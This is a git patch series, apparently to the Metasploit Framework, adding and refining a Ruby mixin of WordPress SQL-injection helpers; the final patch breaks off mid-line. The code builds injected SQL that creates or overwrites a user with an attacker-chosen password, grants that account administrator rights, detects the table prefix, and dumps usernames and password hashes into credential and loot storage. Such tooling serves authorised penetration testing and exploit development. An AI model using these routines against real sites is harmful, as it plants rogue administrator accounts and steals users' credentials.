From 14f1d6a786ae9f559f7d28c22d686ca1085db04d Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 00:33:19 +0200 Subject: [PATCH 01/22] Add Msf::Exploit::Remote::HTTP::Wordpress::SQLi --- .../exploit/remote/http/wordpress/sqli.rb | 167 ++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 lib/msf/core/exploit/remote/http/wordpress/sqli.rb diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb new file mode 100644 index 000000000000..2c85e43d120d --- /dev/null +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -0,0 +1,167 @@ +module Msf + # This module provides reusable SQLi (SQL Injection) helper functions + # for WordPress exploits in Metasploit Framework. These functions allow + # for actions such as creating new users, granting privileges, and + # dumping user credentials via SQL injection vulnerabilities in WordPress. + # + # Usage: + # Include this module in your exploit or auxiliary module and use + # the provided functions to simplify SQL injection logic. + module Exploit::Remote::HTTP::Wordpress::SQLi + include Msf::Exploit::SQLi + # Function to initialize the SQLi instance in the mixin. + # + # This function sets up the SQLi instance that is initialized in the exploit module. + # The SQLi instance is passed as a parameter to ensure it is accessible within the mixin + # and can be used for executing SQL injection queries. + # + # @param sqli [Object] The SQLi instance initialized in the exploit module. + # @return [void] + + def wordpress_sqli_initialize_sqli(sqli) + @sqli = sqli + end + + # Inject an user into the WordPress database, creating or updating an entry. + # + # This method either creates a new user entry in the 'users' table or updates an existing one. + # If the user already exists, their password, nicename, email, and display name will be updated. + # Otherwise, a new user will be created with the provided credentials and default values. + # The password is hashed using MD5 for compatibility with older WordPress versions. + # + # @param username [String] The username for the new or updated user. + # @param password [String] The password for the new user (stored as an MD5 hash). + # @param email [String] The email for the new user. + # @param table_prefix [String] The prefix of the WordPress database tables. + # @return [void] + def wordpress_sqli_create_user(username, password, email, table_prefix) + user_query = <<-SQL + INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' + FROM DUAL + WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') + LIMIT 1 + SQL + + update_query = <<-SQL + UPDATE #{table_prefix}users + SET user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' + WHERE user_login = '#{username}' + SQL + + @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) + @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' ')) + + print_status("{WPSQLi} User '#{username}' created or updated successfully.") + end + + # Grant admin privileges to the specified user by creating or updating the appropriate meta entry. + # + # This method either creates a new entry in the 'usermeta' table or updates an existing one + # to grant administrator capabilities to the specified user. If the entry for the user's + # capabilities already exists, it will be updated to assign administrator privileges. + # If the entry does not exist, a new one will be created. + # + # @param username [String] The username of the user to grant privileges to. + # @param table_prefix [String] The prefix of the WordPress database tables. + # @return [void] + def wordpress_sqli_grant_admin_privileges(username, table_prefix) + admin_query = <<-SQL + INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) + VALUES ( + (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), + '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + ) + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + SQL + + @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) + print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.") + end + + # Identify the table prefix for the WordPress installation + # + # @return [String] The detected table prefix + # @raise [Failure::UnexpectedReply] If the table prefix could not be detected + def wordpress_sqli_identify_table_prefix + default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'" + result = @sqli.run_sql(default_prefix_check)&.to_i + + if result == 0 + prefix = 'wp_' + print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") + else + print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + query = <<-SQL + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 + SQL + + prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) + unless prefix && !prefix.strip.empty? + print_error('{WPSQLi} Unable to detect the table prefix.') + return nil + end + + prefix.strip! + prefix << '_' unless prefix.end_with?('_') + print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + end + + prefix + end + + # Get users' credentials from the wp_users table + # + # @param table_prefix [String] The prefix of the WordPress database tables + # @param count [Integer] The number of users to retrieve (default: 10) + # @return [Array] Array of arrays containing user login and password hash + def wordpress_sqli_get_users_credentials(table_prefix, count = 10) + columns = ['user_login', 'user_pass'] + data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) + + table = Rex::Text::Table.new( + 'Header' => 'wp_users', + 'Indent' => 4, + 'Columns' => columns + ) + + data.each do |user| + table << user + + create_credential({ + workspace_id: myworkspace_id, + origin_type: :service, + module_fullname: fullname, + username: user[0], + private_type: :nonreplayable_hash, + jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]), + private_data: user[1], + service_name: 'WordPress', + address: ip, + port: datastore['RPORT'], + protocol: 'tcp', + status: Metasploit::Model::Login::Status::UNTRIED + }) + end + + print_status('{WPSQLi} Dumped user data:') + print_line(table.to_s) + + return data + end + end +end From 3da638e37e3d54d0b33082e2ef5446dd5bc2a38a Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 00:58:09 +0200 Subject: [PATCH 02/22] Using dynamic prefix in table --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 2c85e43d120d..6019466c1a0e 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -134,7 +134,7 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) table = Rex::Text::Table.new( - 'Header' => 'wp_users', + 'Header' => "#{table_prefix}users", 'Indent' => 4, 'Columns' => columns ) From fa0d54eaf2ded3c7f74c8ae04bb5d5ace235d8f3 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 01:00:48 +0200 Subject: [PATCH 03/22] Add Metasploit::Credential::Creation to use create_credential --- .../exploit/remote/http/wordpress/sqli.rb | 60 +++++++++---------- 1 file changed, 30 insertions(+), 30 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 6019466c1a0e..66e717233c5d 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -36,20 +36,20 @@ def wordpress_sqli_initialize_sqli(sqli) # @return [void] def wordpress_sqli_create_user(username, password, email, table_prefix) user_query = <<-SQL - INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) - SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' - FROM DUAL - WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') - LIMIT 1 + INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' + FROM DUAL + WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') + LIMIT 1 SQL update_query = <<-SQL - UPDATE #{table_prefix}users - SET user_pass = MD5('#{password}'), - user_nicename = '#{username}', - user_email = '#{email}', - display_name = '#{username}' - WHERE user_login = '#{username}' + UPDATE #{table_prefix}users + SET user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' + WHERE user_login = '#{username}' SQL @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) @@ -70,13 +70,13 @@ def wordpress_sqli_create_user(username, password, email, table_prefix) # @return [void] def wordpress_sqli_grant_admin_privileges(username, table_prefix) admin_query = <<-SQL - INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) - VALUES ( - (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), - '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' - ) - ON DUPLICATE KEY UPDATE - meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) + VALUES ( + (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), + '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + ) + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) @@ -97,17 +97,17 @@ def wordpress_sqli_identify_table_prefix else print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 SQL prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) @@ -142,7 +142,7 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) data.each do |user| table << user - create_credential({ + Metasploit::Credential::Creation.create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, From a1b4106260b25e4aa4134f7d21efdaccf4254dea Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 01:57:46 +0200 Subject: [PATCH 04/22] Fix wordpress_sqli_get_users_credentials and rename wordpress_sqli_initialize --- .../exploit/remote/http/wordpress/sqli.rb | 78 +++++++++++-------- 1 file changed, 46 insertions(+), 32 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 66e717233c5d..95337043ca81 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -18,7 +18,7 @@ module Exploit::Remote::HTTP::Wordpress::SQLi # @param sqli [Object] The SQLi instance initialized in the exploit module. # @return [void] - def wordpress_sqli_initialize_sqli(sqli) + def wordpress_sqli_initialize(sqli) @sqli = sqli end @@ -36,20 +36,20 @@ def wordpress_sqli_initialize_sqli(sqli) # @return [void] def wordpress_sqli_create_user(username, password, email, table_prefix) user_query = <<-SQL - INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) - SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' - FROM DUAL - WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') - LIMIT 1 + INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' + FROM DUAL + WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') + LIMIT 1 SQL update_query = <<-SQL - UPDATE #{table_prefix}users - SET user_pass = MD5('#{password}'), - user_nicename = '#{username}', - user_email = '#{email}', - display_name = '#{username}' - WHERE user_login = '#{username}' + UPDATE #{table_prefix}users + SET user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' + WHERE user_login = '#{username}' SQL @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) @@ -70,13 +70,13 @@ def wordpress_sqli_create_user(username, password, email, table_prefix) # @return [void] def wordpress_sqli_grant_admin_privileges(username, table_prefix) admin_query = <<-SQL - INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) - VALUES ( - (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), - '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' - ) - ON DUPLICATE KEY UPDATE - meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) + VALUES ( + (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), + '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + ) + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) @@ -97,17 +97,17 @@ def wordpress_sqli_identify_table_prefix else print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 SQL prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) @@ -127,9 +127,10 @@ def wordpress_sqli_identify_table_prefix # Get users' credentials from the wp_users table # # @param table_prefix [String] The prefix of the WordPress database tables + # @param ip [String] The target IP address # @param count [Integer] The number of users to retrieve (default: 10) # @return [Array] Array of arrays containing user login and password hash - def wordpress_sqli_get_users_credentials(table_prefix, count = 10) + def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10) columns = ['user_login', 'user_pass'] data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) @@ -139,10 +140,12 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) 'Columns' => columns ) + loot_data = '' data.each do |user| table << user + loot_data << "Username: #{user[0]}, Password Hash: #{user[1]}\n" - Metasploit::Credential::Creation.create_credential({ + create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, @@ -161,6 +164,17 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) print_status('{WPSQLi} Dumped user data:') print_line(table.to_s) + loot_path = store_loot( + 'wordpress.users', + 'text/plain', + ip, + loot_data, + 'wp_users.txt', + 'WordPress Usernames and Password Hashes' + ) + + print_good("Loot saved to: #{loot_path}") + return data end end From 2d6862ccd4a1f9de760e60ee4c2fe889c8d59c89 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 03:57:17 +0200 Subject: [PATCH 05/22] Add recommendations --- .../exploit/remote/http/wordpress/sqli.rb | 110 ++++++++---------- 1 file changed, 50 insertions(+), 60 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 95337043ca81..e8701ddc62b6 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -20,6 +20,7 @@ module Exploit::Remote::HTTP::Wordpress::SQLi def wordpress_sqli_initialize(sqli) @sqli = sqli + @prefix = wordpress_sqli_identify_table_prefix end # Inject an user into the WordPress database, creating or updating an entry. @@ -32,28 +33,24 @@ def wordpress_sqli_initialize(sqli) # @param username [String] The username for the new or updated user. # @param password [String] The password for the new user (stored as an MD5 hash). # @param email [String] The email for the new user. - # @param table_prefix [String] The prefix of the WordPress database tables. # @return [void] - def wordpress_sqli_create_user(username, password, email, table_prefix) - user_query = <<-SQL - INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) - SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' - FROM DUAL - WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') - LIMIT 1 + def wordpress_sqli_create_user(username, password, email) + query = <<-SQL + INSERT INTO #{@prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', user_registered, user_status, '#{username}' + FROM #{@prefix}users + WHERE NOT EXISTS ( + SELECT 1 FROM #{@prefix}users WHERE user_login = '#{username}' + ) + LIMIT 1 + ON DUPLICATE KEY UPDATE + user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' SQL - update_query = <<-SQL - UPDATE #{table_prefix}users - SET user_pass = MD5('#{password}'), - user_nicename = '#{username}', - user_email = '#{email}', - display_name = '#{username}' - WHERE user_login = '#{username}' - SQL - - @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) - @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' ')) + @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) print_status("{WPSQLi} User '#{username}' created or updated successfully.") end @@ -66,17 +63,15 @@ def wordpress_sqli_create_user(username, password, email, table_prefix) # If the entry does not exist, a new one will be created. # # @param username [String] The username of the user to grant privileges to. - # @param table_prefix [String] The prefix of the WordPress database tables. # @return [void] - def wordpress_sqli_grant_admin_privileges(username, table_prefix) + def wordpress_sqli_grant_admin_privileges(username) admin_query = <<-SQL - INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) - VALUES ( - (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), - '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' - ) - ON DUPLICATE KEY UPDATE - meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + INSERT INTO #{@prefix}usermeta (user_id, meta_key, meta_value) + SELECT ID, '#{@prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + FROM #{@prefix}users + WHERE user_login = '#{username}' + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) @@ -92,50 +87,45 @@ def wordpress_sqli_identify_table_prefix result = @sqli.run_sql(default_prefix_check)&.to_i if result == 0 - prefix = 'wp_' print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") - else - print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') - query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 - SQL - - prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) - unless prefix && !prefix.strip.empty? - print_error('{WPSQLi} Unable to detect the table prefix.') - return nil - end - - prefix.strip! - prefix << '_' unless prefix.end_with?('_') - print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + return 'wp_' + end + print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + query = <<-SQL + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 + SQL + + prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) + unless prefix && !prefix.strip.empty? + print_error('{WPSQLi} Unable to detect the table prefix.') + return nil end + print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + prefix end # Get users' credentials from the wp_users table # - # @param table_prefix [String] The prefix of the WordPress database tables - # @param ip [String] The target IP address # @param count [Integer] The number of users to retrieve (default: 10) # @return [Array] Array of arrays containing user login and password hash - def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10) + def wordpress_sqli_get_users_credentials(count = 10) columns = ['user_login', 'user_pass'] - data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) + data = @sqli.dump_table_fields("#{@prefix}users", columns, '', count) table = Rex::Text::Table.new( - 'Header' => "#{table_prefix}users", + 'Header' => "#{@prefix}users", 'Indent' => 4, 'Columns' => columns ) @@ -154,7 +144,7 @@ def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10) jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]), private_data: user[1], service_name: 'WordPress', - address: ip, + address: datastore['RHOST'], port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED From a5d9a06b9ae4a7b5b682eda1ad078aaaae1e3708 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 04:43:27 +0200 Subject: [PATCH 06/22] Fix with datastore['RHOST'] --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index e8701ddc62b6..501a941a574b 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -9,6 +9,7 @@ module Msf # the provided functions to simplify SQL injection logic. module Exploit::Remote::HTTP::Wordpress::SQLi include Msf::Exploit::SQLi + # Function to initialize the SQLi instance in the mixin. # # This function sets up the SQLi instance that is initialized in the exploit module. @@ -17,7 +18,6 @@ module Exploit::Remote::HTTP::Wordpress::SQLi # # @param sqli [Object] The SQLi instance initialized in the exploit module. # @return [void] - def wordpress_sqli_initialize(sqli) @sqli = sqli @prefix = wordpress_sqli_identify_table_prefix @@ -157,7 +157,7 @@ def wordpress_sqli_get_users_credentials(count = 10) loot_path = store_loot( 'wordpress.users', 'text/plain', - ip, + datastore['RHOST'], loot_data, 'wp_users.txt', 'WordPress Usernames and Password Hashes' From 0409d4ec9cfb079d8734909aaa5a29f1a07911cd Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 25 Sep 2024 16:38:36 +0200 Subject: [PATCH 07/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Julien Voisin --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 501a941a574b..1d7ae1a247b8 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -50,7 +50,7 @@ def wordpress_sqli_create_user(username, password, email) display_name = '#{username}' SQL - @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) + @sqli.raw_run_sql(query.strip.gsub(/\n/, ' ').gsub(/\s+/, ' ')) print_status("{WPSQLi} User '#{username}' created or updated successfully.") end From 22443b53d6ce4bc9f78e78f9d2458896f97754fd Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 25 Sep 2024 16:39:09 +0200 Subject: [PATCH 08/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Julien Voisin --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 1d7ae1a247b8..b971e112cabb 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -83,10 +83,11 @@ def wordpress_sqli_grant_admin_privileges(username) # @return [String] The detected table prefix # @raise [Failure::UnexpectedReply] If the table prefix could not be detected def wordpress_sqli_identify_table_prefix - default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'" + indicator = rand() + default_prefix_check = "SELECT #{indicator} FROM information_schema.tables WHERE table_name = 'wp_users'" result = @sqli.run_sql(default_prefix_check)&.to_i - if result == 0 + if result == indicator print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") return 'wp_' end From 1e95cba5f268414de174e2763bc686cfa8bc6b5e Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 18:55:26 +0200 Subject: [PATCH 09/22] Randomize values --- .../exploit/remote/http/wordpress/sqli.rb | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index b971e112cabb..2d2cb6a0f97a 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -50,7 +50,7 @@ def wordpress_sqli_create_user(username, password, email) display_name = '#{username}' SQL - @sqli.raw_run_sql(query.strip.gsub(/\n/, ' ').gsub(/\s+/, ' ')) + @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) print_status("{WPSQLi} User '#{username}' created or updated successfully.") end @@ -83,7 +83,8 @@ def wordpress_sqli_grant_admin_privileges(username) # @return [String] The detected table prefix # @raise [Failure::UnexpectedReply] If the table prefix could not be detected def wordpress_sqli_identify_table_prefix - indicator = rand() + indicator = rand(0..19) + random_alias = Rex::Text.rand_text_alpha(1..5) default_prefix_check = "SELECT #{indicator} FROM information_schema.tables WHERE table_name = 'wp_users'" result = @sqli.run_sql(default_prefix_check)&.to_i @@ -92,18 +93,19 @@ def wordpress_sqli_identify_table_prefix return 'wp_' end print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns #{random_alias} + WHERE #{random_alias}.table_schema = tables.table_schema + AND #{random_alias}.table_name = tables.table_name + AND #{random_alias}.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 SQL prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) From f52cd8ba574a4fe92beaac73212fbe78ce8da064 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Mon, 30 Sep 2024 13:01:25 +0200 Subject: [PATCH 10/22] Add coding: binary header --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 2d2cb6a0f97a..645131417818 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -1,3 +1,5 @@ +# -*- coding: binary -*- + module Msf # This module provides reusable SQLi (SQL Injection) helper functions # for WordPress exploits in Metasploit Framework. These functions allow From 05c579fd65f0458b238e03d5f4c30fdc032aa4c8 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Thu, 3 Oct 2024 16:12:37 +0200 Subject: [PATCH 11/22] Add report_host, report_service and report_vuln --- .../exploit/remote/http/wordpress/sqli.rb | 28 +++++++++++++++++-- 1 file changed, 26 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 645131417818..d77236f236d4 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -1,5 +1,3 @@ -# -*- coding: binary -*- - module Msf # This module provides reusable SQLi (SQL Injection) helper functions # for WordPress exploits in Metasploit Framework. These functions allow @@ -154,6 +152,8 @@ def wordpress_sqli_get_users_credentials(count = 10) protocol: 'tcp', status: 